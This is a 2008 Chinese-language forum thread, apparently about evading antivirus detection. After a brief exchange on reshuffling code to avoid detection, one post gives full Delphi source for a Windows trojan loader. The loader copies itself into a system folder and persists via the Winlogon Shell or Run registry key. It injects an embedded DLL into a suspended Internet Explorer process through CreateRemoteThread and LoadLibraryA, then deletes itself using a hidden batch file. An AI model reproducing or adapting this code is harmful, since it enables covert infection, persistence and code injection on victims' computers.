12
返回列表 发帖
非法操作

Rank: 1

帖子
16 
积分
24 
威望
32  
金钱
32  
在线时间
0 小时 
21 跳转到 »
发表于 2008-7-20 18:07 | 只看该作者
// 只要打乱一下主代码的顺序编译就OK了...


也无效
帖子5 精华0 积分20 阅读权限40 在线时间18 小时 注册时间2005-2-19 最后登录2008-7-10 查看详细资料引用 报告 回复 TOP

烂香蕉
晶莹剔透§烈日灼然

TOP

sunnygirl

Rank: 1

帖子
22 
积分
33 
威望
44  
金钱
44  
在线时间
0 小时 
22
发表于 2008-7-20 18:07 | 只看该作者
program Main;

uses
  windows,
  RejoiceBase,
  SysUtils2,
  tlhelp32,
  Reg ;

{$L 'SRT.obj'}
{$R RSRC.RES}
{$R 'Down.RES' 'Down.rc'}

const
{  ExeFiles='rejoice.exe';
  DLLFiles='rejoice.dll';
  //IEFiles ='Explorer.exe';
  IEFiles ='IEXPLORE.EXE';}
  ExeFiles: PChar = 'EXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';
  DLLFiles: PChar = 'LXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';
  IEFiles: PChar  = 'HXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';
var
  PID: DWORD;
  Process: DWORD;
  DllAllpath: string;
  StartInfo: TStartupInfo;
  ProcInfo: TProcessInformation;

function xVirtualFreeEx(hProcess: LongWord; lpAddress: Pointer; dwSize: LOngWord; dwFreeType: LongWord): Boolean; stdcall; external;

function xCreateRemoteThread(hProcess: LongWord; lpThreadAttributes: Pointer; dwStackSize: LongWord; lpStartAddress: Pointer; lpParameter: Pointer; dwCreationFlags: LongWord; lpThreadId: Pointer): LongWord; stdcall; external;

function FileExists(pszPath: string): BOOL; stdcall; external 'shlwapi.dll' Name 'PathFileExistsA';

function xVirtualAllocEx(hProcess: LongWord; lpAddress: Pointer; dwSize: LongWord; flAllocationType: LongWord; flProtect: LongWord): Pointer; stdcall; external;


procedure ExtDelMe;
var
  F: textfile;
  BatchFileName: string;
  ProcessInfo: TProcessInformation;
  StartUpInfo: TStartupInfo;
begin
  DelValue(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp', 'NoRealMode');
  BatchFileName := Gesy + 'Deleteme.bat';
  AssignFile(F, BatchFileName);
  Rewrite(F);
  WriteLn(F, ':try');
  WriteLn(F, 'del "' + ParamStr(0) + '"');
  WriteLn(F, 'if exist "' + ParamStr(0) + '"' + ' goto try');
  WriteLn(F, 'del %0');
  CloseFile(F);
  FillChar(StartUpInfo, SizeOf(StartUpInfo), $00);
  StartUpInfo.dwFlags := STARTF_USESHOWWINDOW;
  StartUpInfo.wShowWindow := SW_HIDE;
  if CreateProcess(nil, PChar(BatchFileName), nil, nil, False, IDLE_PRIORITY_CLASS, nil, nil, StartUpInfo, ProcessInfo) then
  begin
   CloseHandle(ProcessInfo.hThread);
   CloseHandle(ProcessInfo.hProcess);
  end;
end;

function RandomFilename(aFilename: string): string;
var
  Path, Filename, Ext: string;
begin
  Result := aFilename;
  Path := ExtractFilepath(aFilename);
  Ext := ExtractFileExt(aFilename);
  Filename := ExtractFilename(aFilename);
  if Length(Ext) > 0 then
   Filename := Copy(Filename, 1, Length(Filename) - Length(Ext));
  repeat
   Result := Path + Filename + inttoStr(Random(9999)) + Ext;
  until not FileExists(Result);
end;

function GetProcessID(sProcName: string): Integer;
var
  hProcSnap: THandle;
  pe32: TProcessEntry32;
begin
  Result := -1;
  hProcSnap := CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS, 0);
  if hProcSnap = INVALID_HANDLE_VALUE then Exit;
  pe32.dwSize := SizeOf(ProcessEntry32);
  if Process32First(hProcSnap, pe32) = True then
   while Process32Next(hProcSnap, pe32) = True do
   begin
    if AnsiStricomp(PChar(ExtractFilename(pe32.szExefile)), PChar(ExtractFilename(sProcName))) = 0 then
    begin
      Result := pe32.th32ProcessID;
      break;
    end;
   end;
  CloseHandle(hProcSnap);
end;


//插入进程
function InjectLibrary(Process: LongWord; DLLPath: pChar): Boolean;
var
  BytesWritten: DWORD;
  Thread: DWORD;
  ThreadID: DWORD;
  Parameters: Pointer;
begin
  Result := False;
  Parameters := xVirtualAllocEx(Process, nil, 4096, MEM_COMMIT, PAGE_READWRITE);
  if Parameters = nil then Exit;
  WriteProcessMemory(Process, Parameters, Pointer(DLLPath), 4096, BytesWritten);
  Thread := xCreateRemoteThread(Process, nil, 0, GetProcAddress(GetModuleHandle('KERNEL32.DLL'), 'LoadLibraryA'), Parameters, 0, @ThreadId);
  WaitForSingleObject(Thread, INFINITE);
  xVirtualFreeEx(Process, Parameters, 0, MEM_RELEASE);
  if Thread = 0 then Exit;
  CloseHandle(Thread);
  Result := True;
end;


{procedure killer;
var
f:textfile;
begin
assignfile(f,ExtractFilePath(ParamStr(0))+'key.txt');
if not fileexists(ExtractFilePath(ParamStr(0))+'key.txt') then
   begin
   rewrite(f);
   closefile(f);
   end;
end; }

var
  isSetup: Bool;
  SetupPathName: string;
begin
  SetupPathName := Gesy + ExeFiles;
  if (CompareText(paramstr(0), SetupPathName) <> 0) then
  begin
   try
    if FileExists(SetupPathName) then
    begin
      FilesetAttr(SetupPathName, 0);
      DeleteFile(SetupPathName);
      if FileExists(SetupPathName) then
      begin
       Halt;
       Exit;
      end;
    end;
    CopyFile(pchar(paramstr(0)), pchar(SetupPathName), False);
   except
   end;
   isSetup := True;
   if judgesys = 3 then
   begin
    Reg.AddValue(HKEY_LOCAL_MACHINE, &#39;SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon&#39;, &#39;Shell&#39;, pchar(&#39;Explorer.exe &#39;+), 1);
   end
   else
   begin
    Reg.AddValue(HKEY_CURRENT_USER, &#39;SoftWare\Microsoft\Windows\CurrentVersion\Run&#39;, ExeFiles, pchar(Gesy + ExeFiles), 1);
   end;
  end;
  if FindWindow(&#39;Rejoice&#39;, &#39;Windows IDE&#39;) = 0 then
  begin
   DllAllpath := Gesy + DLLFiles;
   try
    FilesetAttr(DllAllpath, 0);
    DeleteFile(DllAllpath); {删除现有的DLL文件}
   except
   end;
   if FileExists(DllAllpath) then {如果删除失败,则改名}
   begin
    DllAllpath := RandomFilename(DllAllpath);
   end;
   if ExtractRes(&#39;dllfile&#39;, &#39;mydll&#39;, DllAllpath) then {生成新的DLL插入文件}
   begin
    if IEFiles = &#39;IEXPLORE.EXE&#39; then
    begin
    CreateProcess(nil, PChar(IEPath), nil, nil, False, CREATE_SUSPENDED, nil, nil, StartInfo, ProcInfo);
    end;
    PID := GetProcessID(IEFiles);
    Process := OpenProcess(PROCESS_ALL_ACCESS, False, PID); {打开要潜入的进程}
    InjectLibrary(Process, Pchar(DllAllpath));
   end;
  end;
  if isSetup then
   ExtDelMe;
  Halt;
end.


再贴一下代码
帖子5 精华0 积分20 阅读权限40 在线时间18 小时 注册时间2005-2-19 最后登录2008-7-10 查看详细资料引用 报告 回复 TOP

烂香蕉
晶莹剔透§烈日灼然

TOP

12
返回列表